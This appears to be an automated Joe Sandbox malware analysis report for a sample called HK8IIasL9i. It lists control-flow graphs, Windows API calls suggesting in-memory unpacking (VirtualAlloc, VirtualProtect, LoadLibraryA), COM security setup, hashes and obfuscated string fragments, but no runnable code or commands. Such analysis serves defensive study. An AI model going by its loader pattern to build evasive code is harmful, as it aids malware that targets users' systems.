                                                                                                                                                                                                                                                        • Instruction ID: 0bdba0f6bf2b5cd18ae264ba298f37260da84434396a298b3053f459174327b1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9C11C270218340AFC310DF65DDC1B6BBFE2DBC2204F65983DE185A72A1C675E9499719

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 0 73003c-730047 1 730049 0->1 2 73004c-730263 call 730a3f call 730e0f call 730d90 VirtualAlloc 0->2 1->2 17 730265-730289 call 730a69 2->17 18 73028b-730292 2->18 23 7302ce-7303c2 VirtualProtect call 730cce call 730ce7 17->23 20 7302a1-7302b0 18->20 22 7302b2-7302cc 20->22 20->23 22->20 29 7303d1-7303e0 23->29 30 7303e2-730437 call 730ce7 29->30 31 730439-7304b8 VirtualFree 29->31 30->29 33 7305f4-7305fe 31->33 34 7304be-7304cd 31->34 37 730604-73060d 33->37 38 73077f-730789 33->38 36 7304d3-7304dd 34->36 36->33 42 7304e3-730505 LoadLibraryA 36->42 37->38 43 730613-730637 37->43 40 7307a6-7307b0 38->40 41 73078b-7307a3 38->41 44 7307b6-7307cb 40->44 45 73086e-7308be LoadLibraryA 40->45 41->40 46 730517-730520 42->46 47 730507-730515 42->47 48 73063e-730648 43->48 49 7307d2-7307d5 44->49 52 7308c7-7308f9 45->52 50 730526-730547 46->50 47->50 48->38 51 73064e-73065a 48->51 53 7307d7-7307e0 49->53 54 730824-730833 49->54 55 73054d-730550 50->55 51->38 56 730660-73066a 51->56 57 730902-73091d 52->57 58 7308fb-730901 52->58 59 7307e2 53->59 60 7307e4-730822 53->60 64 730839-73083c 54->64 61 7305e0-7305ef 55->61 62 730556-73056b 55->62 63 73067a-730689 56->63 58->57 59->54 60->49 61->36 65 73056f-73057a 62->65 66 73056d 62->66 67 730750-73077a 63->67 68 73068f-7306b2 63->68 64->45 69 73083e-730847 64->69 75 73059b-7305bb 65->75 76 73057c-730599 65->76 66->61 67->48 70 7306b4-7306ed 68->70 71 7306ef-7306fc 68->71 72 73084b-73086c 69->72 73 730849 69->73 70->71 77 73074b 71->77 78 7306fe-730748 71->78 72->64 73->45 83 7305bd-7305db 75->83 76->83 77->63 78->77 83->55
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0073024D
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                                                                        • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                                        • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                        • Instruction ID: adef7a5cbd920eb9168ed7290e46249576032640bd78cd8557e12777c8e80788
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7A527974A00229DFDB64CF68C994BA8BBB1BF09304F1480D9E50DAB352DB34AE95DF54

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 202 730e0f-730e24 SetErrorMode * 2 203 730e26 202->203 204 730e2b-730e2c 202->204 203->204
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • SetErrorMode.KERNELBASE(00000400,?,?,00730223,?,?), ref: 00730E19
                                                                                                                                                                                                                                                        • SetErrorMode.KERNELBASE(00000000,?,?,00730223,?,?), ref: 00730E1E
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorMode
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2340568224-0
                                                                                                                                                                                                                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                        • Instruction ID: 8ac00d33d73c15a558b5e8251d4a1b50dc3861c956267a4a53638a43432616dc
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 83D0123124512C77D7003A94DC09BCD7B1CDF05B62F008411FB0DD9081C774994046E5

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 205 40e71a-40e738 CoUninitialize * 2
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Uninitialize
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3861434553-0
                                                                                                                                                                                                                                                        • Opcode ID: bd4e50c2cf2632c146e6dc99e67d996af78d75fcb2eac0acec7d90a27868b704
                                                                                                                                                                                                                                                        • Instruction ID: 47d587ad0eb400b5f6ee0cc7c77a8a39c50d7b10eba8d8677ba26603a35f3bb5
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bd4e50c2cf2632c146e6dc99e67d996af78d75fcb2eac0acec7d90a27868b704
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 10C04CFDA85141EFD384CF24EC5A4157725AB866873000535F913C2370CA6065818A0C

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 206 43c2c8-43c2d6 207 43c2e0-43c2fd 206->207 207->207 208 43c2ff-43ccb9 GetForegroundWindow call 43e110 207->208 211 43ccbe-43ccdf 208->211
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetForegroundWindow.USER32 ref: 0043CCAF
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ForegroundWindow
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2020703349-0
                                                                                                                                                                                                                                                        • Opcode ID: ee62edd4f90ceb3851fb76d6bb2596050db7060e58c86fce7ad8149e0838c105
                                                                                                                                                                                                                                                        • Instruction ID: 8fb46afbfb550afb85baefcd5c24b2e1a72551ea741637eac68a3138d718cba2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ee62edd4f90ceb3851fb76d6bb2596050db7060e58c86fce7ad8149e0838c105
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 07F04CBAD005408BDB044B75CC821A67BA2DB5F320B18897DD441E3384C63C5807CB5D

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 212 40c550-40c580 CoInitializeEx
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C563
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Initialize
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2538663250-0
                                                                                                                                                                                                                                                        • Opcode ID: 6fc60a274ed566bab613781af0777c43ce176e621231eb36fbaf2a6aedf8035e
                                                                                                                                                                                                                                                        • Instruction ID: e03bcfaf696d6c281ff3d22d3b8d0c31e3889364fa9117d67ae1079de8c3c82d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6fc60a274ed566bab613781af0777c43ce176e621231eb36fbaf2a6aedf8035e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 43D0A7B557050867D2086B1DDC4BF22772C8B83B66F50423DF2A7C61D1D9506A14CA79

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 213 40c583-40c5b2 CoInitializeSecurity
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C595
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: InitializeSecurity
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 640775948-0
                                                                                                                                                                                                                                                        • Opcode ID: 49e86824338073915e330635472e4cd66e95047cd3c20be69d528b314b786c07
                                                                                                                                                                                                                                                        • Instruction ID: 58e2b5502705141ff0d3aa7c975cc0701997441b8ab7d7d43dac110591522243
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 49e86824338073915e330635472e4cd66e95047cd3c20be69d528b314b786c07
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F1D0C9B47D83407AF5749B08AC17F143210A702F56F740228B363FE2E0C9E172018A0C

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 215 43aaa0-43aaac 216 43aab3-43aabe call 43d810 RtlFreeHeap 215->216 217 43aac4-43aac5 215->217 216->217
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL(?,00000000,?,0043C1D6,?,0040B2E4,00000000,00000001), ref: 0043AABE
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FreeHeap
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3298025750-0
                                                                                                                                                                                                                                                        • Opcode ID: 6bd8f6e4c03da58ea1ddb055db28ee6a0cd2fda4e2937b11b34eec233391d5a2
                                                                                                                                                                                                                                                        • Instruction ID: 16971ee2c2e030bf17817a0d81dc477e65560ccac1e7abaabcdfe7fdc6775186
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6bd8f6e4c03da58ea1ddb055db28ee6a0cd2fda4e2937b11b34eec233391d5a2
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B2D01231505522EBC6102F25FC06B863A58EF0E761F0748B1B4006B071C765ECA186D8

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 220 43aa80-43aa97 call 43d810 RtlAllocateHeap
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(?,00000000,?,?,0043C1C0), ref: 0043AA90
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                                                                        • Opcode ID: 733e1922efac4f9a0d584a8944a64cd40278d35b25fcdbd161a554f2c268bb95
                                                                                                                                                                                                                                                        • Instruction ID: 72b53a506d10aa35cab301047588232e26feb19e762ad2a100d4e8a4b6eb39e1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 733e1922efac4f9a0d584a8944a64cd40278d35b25fcdbd161a554f2c268bb95
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D6C09231445220BBCA143B16FC09FCA3F68EF4D762F0244A6F514670B2CB61BCA2CAD8
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 004704B6
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488177075.0000000000470000.00000040.00001000.00020000.00000000.sdmp, Offset: 00470000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_470000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                                                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                        • Instruction ID: a0bfb27cbe6de90053606688358b4ba16acdfac2ce2fc8a29e6b2121caff52c3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6F113F79A40208EFDB01DF98C985E99BBF5AF08350F05C095F9489B362D375EA50DF84
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: $!$($+$,$.$/$0$0$1$1$1$1$2$3$3$4$5$5$7$7$8$9$:$;$<$<$=$>$>$?$?$?$@$@$@$B$B$D$D$D$F$J$L$L$N$P$R$T$U$V$W$X$X$Y$Z$[$[$\$]$^$_$`$`$b$b$d$f$f$g$j$o$o$q$r$r$s$u$v$v$x${$|
                                                                                                                                                                                                                                                        • API String ID: 0-561599860
                                                                                                                                                                                                                                                        • Opcode ID: 10d440d78822d09e0470b5f34489f211c766880f4e3e3e7e2fe2868a43d71886
                                                                                                                                                                                                                                                        • Instruction ID: f086b17abffa5a23de60675b3e35e143f4d24521fa3f36365588902221ef9ede
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 10d440d78822d09e0470b5f34489f211c766880f4e3e3e7e2fe2868a43d71886
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B013AC3150C7C08AD3359B38C4543DFBBE1ABD6314F188A6EE4E9873C2D6B989858B57
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: $!$($+$,$.$/$0$0$1$1$1$1$2$3$3$4$5$5$7$7$8$9$:$;$<$<$=$>$>$?$?$?$@$@$@$B$B$D$D$D$F$J$L$L$N$P$R$T$U$V$W$X$X$Y$Z$[$[$\$]$^$_$`$`$b$b$d$f$f$g$j$o$o$q$r$r$s$u$v$v$x${$|
                                                                                                                                                                                                                                                        • API String ID: 0-561599860
                                                                                                                                                                                                                                                        • Opcode ID: 5d0905d9e0f91c5c418c3ecbfefb3f90c6b7c7927ba12d209d8fa4479d815a2e
                                                                                                                                                                                                                                                        • Instruction ID: 6bc0c0bd1fe77db173058f24fa9824335b24732d1e5cf2b1f0a45ec82fb05afa
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5d0905d9e0f91c5c418c3ecbfefb3f90c6b7c7927ba12d209d8fa4479d815a2e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BA138A3150C7C18AD3359B3884583AFBBE1ABD6324F188A6DE4E9873C2D7798945CB53
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: -$.$0$1$4$5$:$=$@$B$D$F$G$H$J$L$N$N$P$R$T$V$X$Z$\$\$^$i$p$q$x$z${$|$~
                                                                                                                                                                                                                                                        • API String ID: 0-168325148
                                                                                                                                                                                                                                                        • Opcode ID: dffcdbe7c59816050bcb47420a350e77fe25c9c65786c839b5995c95da9d8176
                                                                                                                                                                                                                                                        • Instruction ID: 6b3287e7d647f6fc9aa8d330ed56109632cb450684d46cb972cc03f30992e160
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dffcdbe7c59816050bcb47420a350e77fe25c9c65786c839b5995c95da9d8176
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 15D19F2090C7D98EDB22C77C884439EBFA15B67324F1882DDD4E96B3D2C3B94946C766
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: -$.$0$1$4$5$:$=$@$B$D$F$G$H$J$L$N$N$P$R$T$V$X$Z$\$\$^$i$p$q$x$z${$|$~
                                                                                                                                                                                                                                                        • API String ID: 0-168325148
                                                                                                                                                                                                                                                        • Opcode ID: 1931f6c8ecb165f1204fd7e146898a82d55f5c0f38f6d6832a679dd5bdd43d7e
                                                                                                                                                                                                                                                        • Instruction ID: 2ded239b1ef1d41844eea38ed136c927c6da0c0f67fe42f3cbb109069deecc93
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1931f6c8ecb165f1204fd7e146898a82d55f5c0f38f6d6832a679dd5bdd43d7e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5DD1B12090C7D98EDB22C77C884839DBFA15F67328F1882D8D4E96B3D2C3794946C766
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: !$*W.Y$+K!M$;[0]$>C7E$FOEH$NO$U'g)$UGBY$bweM$g#X%$l+X-$w?n!${7y9$$&$EG
                                                                                                                                                                                                                                                        • API String ID: 0-3492884535
                                                                                                                                                                                                                                                        • Opcode ID: 5e16a26193487a4bdaa5a93cbbb181080dd0d43d457804532e7adee19b2f1ec1
                                                                                                                                                                                                                                                        • Instruction ID: ba39798a3fcb6da663dd5afd8d89a9a5fc3f4f782173f0556435d4ff5b4d5338
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5e16a26193487a4bdaa5a93cbbb181080dd0d43d457804532e7adee19b2f1ec1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A3E10EB4608350CFD7249F25E85176FBBF2FB86304F45896DE5D88B252D7388906CB4A
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CoCreateInstance.OLE32(0044168C,00000000,00000001,0044167C,00000000), ref: 00438034
                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32()\"^), ref: 004380C3
                                                                                                                                                                                                                                                        • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00438101
                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32()\"^), ref: 0043817E
                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32()\"^), ref: 00438238
                                                                                                                                                                                                                                                        • VariantInit.OLEAUT32(C7C6C5CC), ref: 004382A8
                                                                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 004383F9
                                                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 0043841D
                                                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00438423
                                                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 00438430
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: String$AllocFree$Variant$BlanketClearCreateInitInstanceProxy
                                                                                                                                                                                                                                                        • String ID: P%R$)\"^$.H4J$O@$pq
                                                                                                                                                                                                                                                        • API String ID: 2485776651-1397720406
                                                                                                                                                                                                                                                        • Opcode ID: 99389cd6846ffddf47e3914131a3c94635c8c48cfc52d90ecef9ec7663b7e69d
                                                                                                                                                                                                                                                        • Instruction ID: 8d1c6a9ba2bf63fa8fe487279597ba15b590cfaf954231a8494ef46f424a72d4
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 99389cd6846ffddf47e3914131a3c94635c8c48cfc52d90ecef9ec7663b7e69d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D022EFB2A483418BD314CF25C880B5BBBE5EFC9704F148A2DF5919B381E779D909CB96
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: #f!x$%y$)Z*\$)Z/\$-^+P$5F6X$6T$7$8JL$9YB$:JL$<[5]$=_%A$>N@$?z=|$A/6Q$VaUc$o#M%$pIrK$tv
                                                                                                                                                                                                                                                        • API String ID: 0-2608794092
                                                                                                                                                                                                                                                        • Opcode ID: 21657e5fc834c3ca3d925c669eca665cb77afa54e23a7c0446644a9599fb4a76
                                                                                                                                                                                                                                                        • Instruction ID: 95d7e76cba02f0a09582511e26c4ad00c8044fe5fc0ebc2eb1bbe37e4d815997
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 21657e5fc834c3ca3d925c669eca665cb77afa54e23a7c0446644a9599fb4a76
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3792C6B59053298BDB24CF59D8887EEBBB1FB85304F2082EDD4596B350DB744A86CF84
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: #f!x$$%$%y$)Z*\$)Z/\$-^+P$5F6X$6T$7$8JL$9YB$:JL$<[5]$=_%A$>N@$?z=|$A/6Q$VaUc$o#M%$pIrK
                                                                                                                                                                                                                                                        • API String ID: 0-1300133108
                                                                                                                                                                                                                                                        • Opcode ID: 58fd2d3b485852ad044d2fcd85ff715361975f915949706d7940c7d1c4703da1
                                                                                                                                                                                                                                                        • Instruction ID: f0effb65835d2d2e0694896053be4e203788fa5b6255ab66f53faa1eae535f9a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 58fd2d3b485852ad044d2fcd85ff715361975f915949706d7940c7d1c4703da1
